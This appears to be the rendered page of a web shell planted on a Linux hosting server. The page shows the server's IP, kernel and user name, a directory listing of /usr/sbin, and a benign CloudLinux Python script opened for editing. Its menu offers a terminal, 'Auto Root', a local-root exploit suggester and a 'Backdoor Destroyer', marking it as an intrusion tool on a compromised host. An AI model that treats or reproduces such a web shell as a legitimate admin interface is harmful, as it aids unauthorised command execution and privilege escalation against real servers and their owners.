Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
sbin /
Delete
Unzip
Name
Size
Permission
Date
Action
cagefs_enter_site
1.83
KB
-rwxr-xr-x
2026-04-17 15:41
cagefsctl-user
13.18
KB
-rwxr-xr-x
2026-04-17 15:41
chroot
41.45
KB
-rwxr-xr-x
2026-03-24 16:35
cloudlinux-selector
654
B
-rwxr-xr-x
2026-04-10 16:20
consoletype
11.88
KB
-rwxr-xr-x
2025-11-10 14:12
cracklib-check
13.05
KB
-rwxr-xr-x
2019-10-12 04:17
cracklib-format
251
B
-rwxr-xr-x
2019-10-12 04:17
cracklib-packer
13.05
KB
-rwxr-xr-x
2019-10-12 04:17
cracklib-unpacker
9.03
KB
-rwxr-xr-x
2019-10-12 04:17
create-cracklib-dict
990
B
-rwxr-xr-x
2019-10-12 04:17
ddns-confgen
20.46
KB
-rwxr-xr-x
2026-06-08 07:08
dnssec-checkds
936
B
-rwxr-xr-x
2026-06-08 07:08
dnssec-coverage
938
B
-rwxr-xr-x
2026-06-08 07:08
dnssec-dsfromkey
60.84
KB
-rwxr-xr-x
2026-06-08 07:08
dnssec-importkey
60.84
KB
-rwxr-xr-x
2026-06-08 07:08
dnssec-keyfromlabel
64.75
KB
-rwxr-xr-x
2026-06-08 07:08
dnssec-keygen
72.84
KB
-rwxr-xr-x
2026-06-08 07:08
dnssec-keymgr
934
B
-rwxr-xr-x
2026-06-08 07:08
dnssec-revoke
56.74
KB
-rwxr-xr-x
2026-06-08 07:08
dnssec-settime
60.84
KB
-rwxr-xr-x
2026-06-08 07:08
dnssec-signzone
117.2
KB
-rwxr-xr-x
2026-06-08 07:08
dnssec-verify
52.84
KB
-rwxr-xr-x
2026-06-08 07:08
exim
1.25
KB
-rwxr-xr-x
2026-05-29 22:30
faillock
20.52
KB
-rwxr-xr-x
2025-12-17 22:24
genrandom
12.38
KB
-rwxr-xr-x
2026-06-08 07:08
ip
693.3
KB
-rwxr-xr-x
2024-05-23 12:06
isc-hmac-fixup
11.85
KB
-rwxr-xr-x
2026-06-08 07:08
ldconfig
986.13
KB
-rwxr-xr-x
2026-05-26 13:09
lvdctl
5.75
KB
-rwxr-xr-x
2026-04-17 15:08
mkhomedir_helper
24.44
KB
-rwxr-xr-x
2025-12-17 22:24
named-checkzone
36.63
KB
-rwxr-xr-x
2026-06-08 07:08
named-compilezone
36.63
KB
-rwxr-xr-x
2026-06-08 07:08
nsec3hash
12.29
KB
-rwxr-xr-x
2026-06-08 07:08
pam_console_apply
45.2
KB
-rwxr-xr-x
2025-12-17 22:24
pam_timestamp_check
11.87
KB
-rwxr-xr-x
2025-12-17 22:24
pluginviewer
20.57
KB
-rwxr-xr-x
2022-02-23 23:43
proxyexec
21.17
KB
-r-xr-xr-x
2020-09-02 12:19
pwhistory_helper
20.44
KB
-rwxr-xr-x
2025-12-17 22:24
saslauthd
94.42
KB
-rwxr-xr-x
2022-02-23 23:43
sasldblistusers2
20.77
KB
-rwxr-xr-x
2022-02-23 23:43
saslpasswd2
16.42
KB
-rwxr-xr-x
2022-02-23 23:43
sendmail
1.26
KB
-rwxr-xr-x
2026-05-29 22:30
snmpd
32.45
KB
-rwxr-xr-x
2026-01-19 11:49
snmptrapd
32.6
KB
-rwxr-xr-x
2026-01-19 11:49
testsaslauthd
16.66
KB
-rwxr-xr-x
2022-02-23 23:43
tmpwatch
35.47
KB
-rwxr-xr-x
2019-10-12 15:02
tsig-keygen
20.46
KB
-rwxr-xr-x
2026-06-08 07:08
unix_chkpwd
36.86
KB
-rwxr-xr-x
2025-12-17 22:24
unix_update
36.86
KB
-rwx------
2025-12-17 22:24
Save
Rename
#!/opt/cloudlinux/venv/bin/python3 -sbb # -*- coding: utf-8 -*- # # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2025 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # https://cloudlinux.com/docs/LICENCE.TXT # """ Execute a command inside CageFS for a site (document root or domain). This wrapper provides a command-line interface for executing commands within the isolated CageFS environment for a specific website. """ import argparse import os import sys from clcagefslib.webisolation import libenter def create_parser(): """ Create argument parser for cagefs_enter_site. Returns: argparse.ArgumentParser: Configured argument parser """ parser = argparse.ArgumentParser( # the command is named with _underscores_ to match # existing cagefs_enter wrapper from lvewrappers prog="cagefs_enter_site", description="Execute a command inside CageFS for a site (document root or domain)", ) parser.add_argument("site", type=str, help="Document root or domain") parser.add_argument( "command", type=str, nargs=argparse.REMAINDER, help="Command to execute" ) return parser def main(): """ Main entry point. Returns: int: Exit code """ parser = create_parser() args = parser.parse_args() if not args.command: parser.error("COMMAND is required") try: return libenter.enter_site(args.site, args.command) except ValueError as e: print(f"Error: {e}", file=sys.stderr) return 1 except KeyboardInterrupt: # Clean Ctrl+C exit without traceback (exit code 130 = SIGINT). return 130 if __name__ == "__main__": if os.geteuid() == 0: print("Error: This program can not be run as root", file=sys.stderr) sys.exit(1) sys.exit(main())